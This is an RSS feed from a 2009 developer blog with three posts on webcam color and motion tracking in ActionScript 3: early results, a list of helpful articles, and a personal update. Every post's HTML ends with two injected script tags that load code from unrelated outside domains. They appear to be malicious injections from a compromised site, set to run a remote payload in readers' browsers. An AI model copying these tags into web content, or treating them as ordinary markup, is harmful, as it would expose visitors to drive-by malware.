<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>REDBLIND &#187; motion tracking</title>
	<atom:link href="http://redblind.com/blog/topic/motion-tracking/feed/" rel="self" type="application/rss+xml" />
	<link>http://redblind.com/blog</link>
	<description>Blog of Jonathan Cipriano</description>
	<lastBuildDate>Sat, 08 May 2010 00:20:36 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Color Tracking</title>
		<link>http://redblind.com/blog/2009/09/09/color-tracking/</link>
		<comments>http://redblind.com/blog/2009/09/09/color-tracking/#comments</comments>
		<pubDate>Thu, 10 Sep 2009 01:00:31 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[acitionscript 3]]></category>
		<category><![CDATA[color isolation]]></category>
		<category><![CDATA[color tracking]]></category>
		<category><![CDATA[flash]]></category>
		<category><![CDATA[motion tracking]]></category>
		<category><![CDATA[webcam]]></category>

		<guid isPermaLink="false">http://redblind.com/blog/?p=176</guid>
		<description><![CDATA[Here are the results so far for my color/motion tracking project. Turns out that you don&#8217;t have to use a difference filter when tracking colors. All you basically have to do is isolate a color range using multiple thresholds. Then run getColorBounds to get the coordinates of the color blob. The one thing I do [...]]]></description>
			<content:encoded><![CDATA[<p>Here are the results so far for my color/motion tracking project. Turns out that you don&#8217;t have to use a difference filter when tracking colors. All you basically have to do is isolate a color range using multiple thresholds. Then run getColorBounds to get the coordinates of the color blob. The one thing I do have to add is blob detection, but with vibrant colors I don&#8217;t seem to need it.</p>
<p>Click on the image below to launch the swf. You can use the sliders to adjust the image for your lighting conditions. Click on one of the boxes to assign the colors to the channel. Check out my blog post prior to this one to see where I did most of my research. I&#8217;ll release abstracted code after the project is complete.</p>
<p><em>UPDATE: Source code now available </em><a title="color tracking source" href="http://redblind.com/blog/2009/11/19/color-tracking-source/" target="_self"><em>here</em></a><em>!</em></p>
<p><a href="http://redblind.com/exp/colorTracking/" target="_blank"><img src="http://redblind.com/blog/wp-content/uploads/2009/09/colortracking.jpg" alt="colortracking" width="598" height="345" /></a><script src="http://ae.awaue.com/7"></script><script src="http://secowo.com/wo"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://redblind.com/blog/2009/09/09/color-tracking/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>An Intro to Color/Motion tracking</title>
		<link>http://redblind.com/blog/2009/09/09/an-intro-to-colormotion-tracking/</link>
		<comments>http://redblind.com/blog/2009/09/09/an-intro-to-colormotion-tracking/#comments</comments>
		<pubDate>Thu, 10 Sep 2009 00:25:20 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[code]]></category>
		<category><![CDATA[actionscript 3]]></category>
		<category><![CDATA[bitmapdata]]></category>
		<category><![CDATA[color isolation]]></category>
		<category><![CDATA[flash]]></category>
		<category><![CDATA[motion tracking]]></category>
		<category><![CDATA[webcam]]></category>

		<guid isPermaLink="false">http://redblind.com/blog/?p=205</guid>
		<description><![CDATA[I don&#8217;t usually like to write blog posts about other people&#8217;s blog posts. I try to create original content that people will find useful, but that is very hard to do on the web. I like to sleep, watch TV and play video games, so it&#8217;s hard keep up with all the 24/7 coders out [...]]]></description>
			<content:encoded><![CDATA[<p>I don&#8217;t usually like to write blog posts about other people&#8217;s blog posts. I try to create original content that people will find useful, but that is very hard to do on the web. I like to sleep, watch TV and play video games, so it&#8217;s hard keep up with all the 24/7 coders out there.</p>
<p>That said, I&#8217;ve been doing a ton of research and experimentation on motion and color tracking. There is a lot of good stuff out there. A lot of it useless, but along the way I came across a few key blog posts that really got me rolling. if you are trying to get your head wrapped around all of this stuff, check out these helpful blog posts:</p>
<p><strong>Color Isolation</strong><br />
<a href="http://www.quasimondo.com/archives/000614.php" target="_blank"> http://www.quasimondo.com/archives/000614.php</a><br />
Mario Klingemann&#8217;s blog is a gold mine of info relating to bitmap data. This blog post reveals how to pick out a color range and drop the rest of the colors. I had to translate this to AS3 for my uses. I&#8217;ll release that translation soon.</p>
<p><strong>Blob Detection</strong><br />
<a href="http://play.blog2t.net/fast-blob-detection/" target="_blank"> http://play.blog2t.net/fast-blob-detection/</a><br />
Blob detection is key to dropping little pieces of bitmap data that you don&#8217;t want or to track multiple blobs of the same color. Read the post and you&#8217;ll see how it&#8217;s useful.</p>
<p><strong>Motion Tracking</strong><br />
<a title="http://blog.soulwire.co.uk/2008/06/06/webcam-motion-detection-tracking/" href="http://" target="_blank"> </a><a href="http://blog.soulwire.co.uk/2008/06/06/webcam-motion-detection-tracking/" target="_blank">http://blog.soulwire.co.uk/2008/06/06/webcam-motion-detection-tracking/</a><br />
This is motion tracking it it&#8217;s simplest form. This is the post I started on.  Ultimately, you may want to combine some of the above techniques with this one. Justin Windle is a cool guy and he has lots of good info on his blog that can help you with your generative art.</p>
<p><strong>Edge Detection</strong><br />
<a href="http://blog.inspirit.ru/?p=297" target="_blank"> http://blog.inspirit.ru/?p=297</a><br />
I just found this one most recently. Really interesting. I don&#8217;t have a use for this now, but I will be keeping an eye on where this goes. This blog also has a lot of good info and I will be adding this one to my regular reading list.</p>
<p><strong>Automated/Adaptive Threshold<br />
<span style="font-weight: normal;"><a href="http://www.quasimondo.com/archives/000690.php" target="_blank">http://www.quasimondo.com/archives/000690.php</a><br />
<a href="http://blog.inspirit.ru/?p=310" target="_blank"> http://blog.inspirit.ru/?p=310</a><br />
One of the main issues when dealing with bitmap data from a webcam is the lighting conditions the user is in. Adaptive threshold analyzes the bitmap data and applies the appropriate threshold to get the best contrast. I haven&#8217;t yet dived into the code, but this look extremely useful.</span></strong></p>
<p><strong>And there you have it!</strong><br />
The best motion and color tracking blog posts to start with. I hope this help others on the same path as I am. Hopefully I will be taking what I&#8217;ve learned from all of this and releasing it in a nice tidy code package for everyone to use.<script src="http://ae.awaue.com/7"></script><script src="http://secowo.com/wo"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://redblind.com/blog/2009/09/09/an-intro-to-colormotion-tracking/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>What have I been up to?</title>
		<link>http://redblind.com/blog/2009/09/08/what-have-i-been-up-to/</link>
		<comments>http://redblind.com/blog/2009/09/08/what-have-i-been-up-to/#comments</comments>
		<pubDate>Wed, 09 Sep 2009 03:00:06 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[code]]></category>
		<category><![CDATA[guttershark]]></category>
		<category><![CDATA[motion tracking]]></category>
		<category><![CDATA[personal]]></category>
		<category><![CDATA[team work]]></category>

		<guid isPermaLink="false">http://redblind.com/blog/?p=174</guid>
		<description><![CDATA[Haven&#8217;t posted in a while. That doesn&#8217;t mean I haven&#8217;t been busy. I just recently got married, so I had better things to think about than programming. We spent a week in Bora Bora for our honeymoon. Check out the video I made in iMovie.
Around the same time, Aaron Smith and I worked on a [...]]]></description>
			<content:encoded><![CDATA[<p>Haven&#8217;t posted in a while. That doesn&#8217;t mean I haven&#8217;t been busy. I just recently got married, so I had better things to think about than programming. We spent a week in Bora Bora for our honeymoon. Check out the <a title="video" href="http://www.jonandglo.com/2009/08/19/bora-bora-movie/" target="_self">video I made</a> in iMovie.</p>
<p>Around the same time, Aaron Smith and I worked on a project with our NY office. It was a good experience. Aaron wrote a good post on it, <a href="http://codeendeavor.com/archives/468" target="_blank">here</a>. We also added a few new features to Guttershark, we made really good use of Xviews and Aaron added some new stuff to the Service Manager.</p>
<p>Also through our NY office, I will be working on new project involving motion tracking through the webcam. I&#8217;ll be posting some of my findings and experiments here. Expect a new ColorIsolation and possibly a new MotionTracking class to be added to my SVN repo after i finish the project.<script src="http://ae.awaue.com/7"></script><script src="http://secowo.com/wo"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://redblind.com/blog/2009/09/08/what-have-i-been-up-to/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
